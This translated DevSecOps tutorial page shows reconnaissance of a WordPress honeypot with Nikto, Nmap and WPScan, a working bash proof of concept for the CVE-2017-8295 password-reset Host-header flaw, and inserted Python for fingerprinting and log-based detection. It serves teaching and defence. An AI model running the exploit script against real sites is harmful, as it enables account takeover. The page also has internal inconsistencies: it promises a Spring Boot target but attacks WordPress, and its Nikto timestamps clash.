DevSecOps – hack yourself and learn along the way

Page 2: Welcome to the Next Level


In the next step you try your hand as a hacker against your own application or system, true to the motto: know your enemy. At this point, a reminder once more that hacking without the consent of the domain or system owner is illegal.

For simplicity, a Docker-based example is used:

The example project contains a vulnerable Spring Boot variant as a Docker container, which is attacked from the Kali console.

With the targets identified, they can now be scanned for services with Nmap or Nikto. The WordPress installation comes straight from the Debian 9 package repositories; otherwise the Debian default configuration was left unchanged. Nikto delivers useful pointers to possible attacks:

root@60808f78e55d:/# nikto -C all -host honeypot-wp.holisticon.de
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 195.201.92.37
+ Target Hostname: honeypot-wp.holisticon.de
+ Target Port: 80
+ Start Time: 2018-05-18 15:39:44 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache/2.4.25 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'link' found, with contents: <http://195.201.92.37/index.php/wp-json/>; rel="https://api.w.org/"
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
+ Scan terminated: 20 error(s) and 6 item(s) reported on remote host
+ End Time: 2018-05-22 03:07:37 (GMT0) (434 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


Nmap additionally reports which services are available:

root@60808f78e55d:/# nmap -Pn -sV --version-all --reason -v honeypot-wp.holisticon.de
Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-21 09:12 UTC
NSE: Loaded 43 scripts for scanning.
Initiating Parallel DNS resolution of 1 host. at 09:12
Completed Parallel DNS resolution of 1 host. at 09:12, 0.00s elapsed
Initiating SYN Stealth Scan at 09:12
Scanning honeypot-wp.holisticon.de (195.201.92.37) [1000 ports]
Discovered open port 80/tcp on 195.201.92.37
Discovered open port 22/tcp on 195.201.92.37
Completed SYN Stealth Scan at 09:12, 3.39s elapsed (1000 total ports)
Initiating Service scan at 09:12
Scanning 2 services on honeypot-wp.holisticon.de (195.201.92.37)
Completed Service scan at 09:13, 6.11s elapsed (2 services on 1 host)
NSE: Script scanning 195.201.92.37.
Initiating NSE at 09:13
Completed NSE at 09:13, 0.20s elapsed
Initiating NSE at 09:13
Completed NSE at 09:13, 0.00s elapsed
Nmap scan report for honeypot-wp.holisticon.de (195.201.92.37)
Host is up, received user-set (0.043s latency).
rDNS record for 195.201.92.37: static.37.92.201.195.clients.your-server.de
Not shown: 995 closed ports
Reason: 995 resets
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 37 OpenSSH 7.4p1 Debian 10+deb9u3 (protocol 2.0)
80/tcp open http syn-ack ttl 37 Apache httpd 2.4.25 ((Debian))
135/tcp filtered msrpc no-response
139/tcp filtered netbios-ssn no-response
445/tcp filtered microsoft-ds no-response
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.08 seconds
Raw packets sent: 1055 (46.420KB) | Rcvd: 1396 (73.430KB)

Only two services were found: SSH and HTTP. The SSH server reveals its version and with it the Debian release: the package revision 10+deb9u3 in the OpenSSH banner identifies Debian 9 (stretch), even though Nmap does not state the distribution release directly. Attackers likewise learn immediately which Apache release is in use, and the Link header Nikto found, pointing at wp-json, already hints at WordPress. The next step is to open the site in a browser, which quickly confirms that it is a WordPress blog. Attackers can then simply search the page source for "generator" to obtain the version:

WordPress Generator Tag in Chrome DevTools
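The passive fingerprinting described above, written out as an added example (this is editor-supplied code, not part of the original article or of any tool it uses). It works on constructed samples modelled on the scan output shown above: the OpenSSH banner with its Debian revision suffix, the Server and Link response headers, and a page source carrying the generator meta tag. The mapping from the "+deb9u3" suffix to Debian 9 and the list of headers Nikto complained about are the only facts assumed beyond the page.

```python
"""Passive fingerprinting of the recon results above, on constructed sample data (added example)."""
import re

# Constructed samples modelled on the nmap/Nikto output and page source shown above;
# they were not captured from honeypot-wp.holisticon.de.
SSH_BANNER = "SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u3"
HTTP_HEADERS = {
    "Server": "Apache/2.4.25 (Debian)",
    "Link": '<http://195.201.92.37/index.php/wp-json/>; rel="https://api.w.org/"',
}
PAGE_SOURCE = (
    '<html><head><meta name="generator" content="WordPress 4.7.5" />'
    '<link rel="https://api.w.org/" href="http://195.201.92.37/index.php/wp-json/" />'
    "</head><body>blog</body></html>"
)

# Debian encodes the release in the package revision: "+deb9u3" is the third
# stable update of that package for Debian 9 (stretch).
DEBIAN_CODENAMES = {7: "wheezy", 8: "jessie", 9: "stretch", 10: "buster"}

# Headers Nikto flagged as missing, with the value a hardened Apache would send.
EXPECTED_HEADERS = {
    "X-Frame-Options": "SAMEORIGIN",
    "X-Content-Type-Options": "nosniff",
}


def debian_release(banner):
    """Return (major, codename) from a banner carrying a Debian '+debNuM' suffix, else None."""
    m = re.search(r"deb(\d+)u\d+", banner)
    if not m:
        return None
    major = int(m.group(1))
    return major, DEBIAN_CODENAMES.get(major, "unknown")


def openssh_version(banner):
    """Upstream OpenSSH version from an SSH identification string, e.g. '7.4p1'."""
    m = re.search(r"OpenSSH[_ ](\d+\.\d+(?:p\d+)?)", banner)
    return m.group(1) if m else None


def apache_version(headers):
    """Apache release from the Server header, e.g. '2.4.25'."""
    m = re.search(r"Apache/(\d+(?:\.\d+)+)", headers.get("Server", ""))
    return m.group(1) if m else None


def wordpress_version(headers, html):
    """Exact version from the generator meta tag; the wp-json Link header alone only
    proves WordPress >= 4.4 (the release that introduced the wp-json endpoint)."""
    m = re.search(
        r'<meta[^>]+name=["\']generator["\'][^>]+content=["\']WordPress ([\d.]+)["\']',
        html, re.IGNORECASE,
    )
    if m:
        return m.group(1)
    if "api.w.org" in headers.get("Link", ""):
        return "unknown (>= 4.4)"
    return None


def missing_security_headers(headers):
    """Names of expected hardening headers absent from the response (case-insensitive)."""
    present = {name.lower() for name in headers}
    return sorted(name for name in EXPECTED_HEADERS if name.lower() not in present)


def fingerprint(ssh_banner, headers, html):
    """Everything an attacker learns without sending a single malicious request."""
    return {
        "openssh": openssh_version(ssh_banner),
        "debian": debian_release(ssh_banner),
        "apache": apache_version(headers),
        "wordpress": wordpress_version(headers, html),
        "missing_headers": missing_security_headers(headers),
    }


if __name__ == "__main__":
    for key, value in fingerprint(SSH_BANNER, HTTP_HEADERS, PAGE_SOURCE).items():
        print(f"{key:16} {value}")
```

The point of the generator fallback is the one a defender should take away: removing the meta tag (a common "hardening" tip) does not hide the version for long, because readme.html, the wp-json Link header and the OpenSSH banner each give it away or narrow it down; the package banners can only be silenced by configuration (ServerTokens Prod, DebianBanner no), and the reset-form vulnerability below does not care about any of them.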

Now WPScan can be used to scan the WordPress installation:

root@60808f78e55d:/# wpscan honeypot-wp.holisticon.de

WordPress Security Scanner by the WPScan Team
Version 2.9.3
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________

[+] URL: http://honeypot-wp.holisticon.de/
[+] Started: Tue May 22 03:11:32 2018

[!] The WordPress 'http://honeypot-wp.holisticon.de/readme.html' file exists exposing a version number
[+] Interesting header: LINK: <http://195.201.92.37/index.php/wp-json/>; rel="https://api.w.org/"
[+] Interesting header: SERVER: Apache/2.4.25 (Debian)
[+] XML-RPC Interface available under: http://honeypot-wp.holisticon.de/xmlrpc.php

[+] WordPress version 4.7.5 (Released on 2017-05-16) identified from links opml, meta generator
[!] 17 vulnerabilities identified from the version number

[!] Title: WordPress 2.3-4.8.3 - Host Header Injection in Password Reset
Reference: https://wpvulndb.com/vulnerabilities/8807
Reference: https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html
Reference: http://blog.dewhurstsecurity.com/2017/05/04/exploitbox-wordpress-security-advisories.html
Reference: https://core.trac.wordpress.org/ticket/25239
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8295
...

[+] WordPress theme in use: twentyseventeen - v1.6

[+] Name: twentyseventeen - v1.6
| Latest version: 1.6 (up to date)
...

[+] Enumerating plugins from passive detection ...
[+] No plugins found

[+] Finished: Tue May 22 03:11:47 2018
[+] Requests Done: 386
[+] Memory used: 17.395 MB
[+] Elapsed time: 00:00:15

CVE-2017-8295 is a promising attack point. Using this flaw, attackers can make WordPress send the password-reset mail with sender and return-path addresses of their choosing and thereby get hold of the critical reset link. It works because WordPress builds the sender address of the outgoing mail from SERVER_NAME, and Apache in its default configuration (UseCanonicalName Off) fills SERVER_NAME one-to-one from the request's Host header. The mail itself still goes to the victim's registered address; the attacker receives the link when that mail bounces (mailbox full, address no longer valid) or when the victim replies or auto-replies with the original quoted. The exact flow is described in the Exploit-DB entry. Note that the 302 the script below treats as success only shows that WordPress accepted the request for an existing user and attempted to send the mail; whether the link ever reaches the attacker depends on the victim's mailbox. An attack would thus look like this, for example:

#!/usr/bin/env bash
# CVE-2017-8295 proof of concept: request a password reset with a spoofed Host header.
# Usage: ./reset.sh <fake-domain> <target-domain> <username>
if [ $# -ne 3 ]; then
    echo "usage: $0 FAKE_DOMAIN DOMAIN USERNAME" >&2
    exit 1
fi

FAKE_DOMAIN=$1   # domain the attacker controls; ends up in the mail's From and Return-Path
DOMAIN=$2        # target WordPress host
USERNAME=$3      # account whose password reset is requested

echo -e "\nAttempting to reset the password for '$USERNAME' on $DOMAIN:"

# Only the HTTP status code is of interest; the body is discarded.
RESPONSE=$(curl --write-out '%{http_code}' --silent --output /dev/null \
    -X POST "http://$DOMAIN/wp-login.php?action=lostpassword" \
    -H 'cache-control: no-cache' \
    -H 'content-type: application/x-www-form-urlencoded' \
    -H "host: $FAKE_DOMAIN" \
    -H "origin: http://$DOMAIN" \
    -H "referer: http://$DOMAIN/wp-login.php?action=lostpassword" \
    -d "user_login=$USERNAME" \
    -d redirect_to= \
    -d wp-submit=Get+New+Password)

# 302: WordPress accepted the request and redirected to the confirmation screen,
#      i.e. the user exists and a reset mail was sent with the spoofed sender.
# 500: the request was accepted, but wp_mail() failed (no mailer configured).
if [ "$RESPONSE" = "302" ]; then
    echo -e "> Uh yeah, it appears that we took over $DOMAIN.\n"
elif [ "$RESPONSE" = "500" ]; then
    echo -e "> Uh yeah, it appears that we took over $DOMAIN, but the mailing seems to be not configured.\n"
else
    echo -e "> $RESPONSE: Good news! $DOMAIN appears to be safe from this exploit.\n"
fi
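To see both halves of the mechanism just described, here is an added example (editor-supplied, not code from the article or from WordPress) with two parts. The first models how the sender address ends up attacker-controlled: Apache's SERVER_NAME follows the Host header while UseCanonicalName is Off, and wp_mail() derives "wordpress@SERVER_NAME" (with a leading "www." stripped) when no From is given. The second is the detection a defender wants: an access-log check that flags reset-form POSTs whose Host header names a domain the site does not serve. It assumes a LogFormat that records the Host header ("%{Host}i %h %t \"%r\" %>s"), since the default combined format does not, and runs on constructed log lines with documentation addresses; the host names and IPs are made up.

```python
"""CVE-2017-8295: how the Host header reaches the mail, and an access-log check for
abuse of the reset form. Added example on constructed data, not part of the original page."""
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

CANONICAL_HOST = "honeypot-wp.holisticon.de"
ALLOWED_HOSTS = {CANONICAL_HOST, "195.201.92.37"}


def server_name_for(host_header, use_canonical_name=False):
    """Apache's SERVER_NAME: with UseCanonicalName Off (the default) it is whatever the
    client sent in Host; with UseCanonicalName On it is the configured ServerName."""
    if use_canonical_name:
        return CANONICAL_HOST
    return host_header.split(":", 1)[0].lower()


def wp_mail_sender(server_name):
    """Sender wp_mail() builds when the caller sets no From: wordpress@SERVER_NAME with a
    leading 'www.' removed. It is also used as envelope sender, so bounces go there."""
    sitename = server_name.lower()
    if sitename.startswith("www."):
        sitename = sitename[4:]
    return f"wordpress@{sitename}"


# Assumed LogFormat "%{Host}i %h %t \"%r\" %>s": the default combined format does not
# record the Host header, and without it this attack is invisible in the access log.
LOG_RE = re.compile(
    r'^(?P<host>\S+) (?P<client>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})$'
)

# Constructed log lines: one legitimate reset, two from a client spoofing Host,
# plus noise and one malformed line the parser must skip.
LOG_LINES = [
    'honeypot-wp.holisticon.de 203.0.113.5 [22/May/2018:03:11:32 +0000] "GET /readme.html HTTP/1.1" 200',
    'attacker.example 198.51.100.7 [22/May/2018:03:20:01 +0000] "POST /wp-login.php?action=lostpassword HTTP/1.1" 302',
    'honeypot-wp.holisticon.de 203.0.113.9 [22/May/2018:03:21:10 +0000] "POST /wp-login.php?action=lostpassword HTTP/1.1" 302',
    'attacker.example:80 198.51.100.7 [22/May/2018:03:20:05 +0000] "POST /wp-login.php?action=lostpassword HTTP/1.1" 302',
    'evil.example 198.51.100.8 [22/May/2018:03:22:00 +0000] "GET /index.php HTTP/1.1" 200',
    'this line is not in the expected format',
]


def parse_line(line):
    """Split one log line into its fields, or return None for lines in another format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_reset_request(rec):
    """POST to wp-login.php with action=lostpassword, i.e. the form the script above submits."""
    if rec["method"] != "POST":
        return False
    url = urlsplit(rec["target"])
    return url.path.endswith("/wp-login.php") and "lostpassword" in parse_qs(url.query).get("action", [])


def find_reset_abuse(lines, allowed_hosts=ALLOWED_HOSTS):
    """Reset requests whose Host header names a domain this site does not serve,
    together with the sender address the resulting mail would carry."""
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or not is_reset_request(rec):
            continue
        host = rec["host"].split(":", 1)[0].lower()
        if host not in allowed_hosts:
            alerts.append({"client": rec["client"], "host": host, "ts": rec["ts"],
                           "leaks_to": wp_mail_sender(server_name_for(rec["host"]))})
    return alerts


def reset_requests_per_client(lines):
    """Reset volume per client, spoofed or not: floods are how attackers fill a mailbox
    so that a later reset mail bounces to them."""
    counts = Counter()
    for line in lines:
        rec = parse_line(line)
        if rec and is_reset_request(rec):
            counts[rec["client"]] += 1
    return dict(counts)


if __name__ == "__main__":
    for alert in find_reset_abuse(LOG_LINES):
        print(f"{alert['ts']} {alert['client']} spoofed Host={alert['host']} -> bounces to {alert['leaks_to']}")
    print(reset_requests_per_client(LOG_LINES))
```

The fix follows from server_name_for(): set an explicit ServerName together with UseCanonicalName On in the vhost, or make sure requests for unknown Host values never reach the WordPress vhost at all, and on the WordPress side pin the sender with the wp_mail_from filter so the address no longer depends on the request. The log check is worth keeping even after the fix, because a burst of reset requests against one account is suspicious regardless of the Host header.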